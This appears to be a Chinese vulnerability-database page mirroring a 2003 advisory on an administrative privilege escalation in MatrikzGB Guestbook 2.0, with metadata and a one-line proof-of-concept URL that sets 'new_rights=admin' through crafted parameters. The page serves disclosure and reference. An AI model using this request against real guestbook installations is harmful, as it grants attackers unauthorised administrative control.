MatrikzGB Guestbook 2.0 – Administrative Privilege Escalation

MatrikzGB Guestbook 2.0 – Administrative Privilege Escalation

漏洞ID 1054104 漏洞类型
发布时间 2003-08-16 更新时间 2003-08-16
图片[1]-MatrikzGB Guestbook 2.0 – Administrative Privilege Escalation-安全小百科CVE编号 N/A
图片[2]-MatrikzGB Guestbook 2.0 – Administrative Privilege Escalation-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23036
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8430/info

MatrikzGB Guestbook is prone to a vulnerability that may permit guestbook users to gain administrative rights. It is possible to exploit this issue by manipulating URI parameters. 

http://www.example.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass

where regularuser and regularpass equal the user credentials of the attacker.

相关推荐: Nullsoft SHOUTcast权限许可和访问控制漏洞

Nullsoft SHOUTcast权限许可和访问控制漏洞 漏洞ID 1206956 漏洞类型 未知 发布时间 1999-08-20 更新时间 1999-08-20 CVE编号 CVE-1999-1561 CNNVD-ID CNNVD-199908-039 漏…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享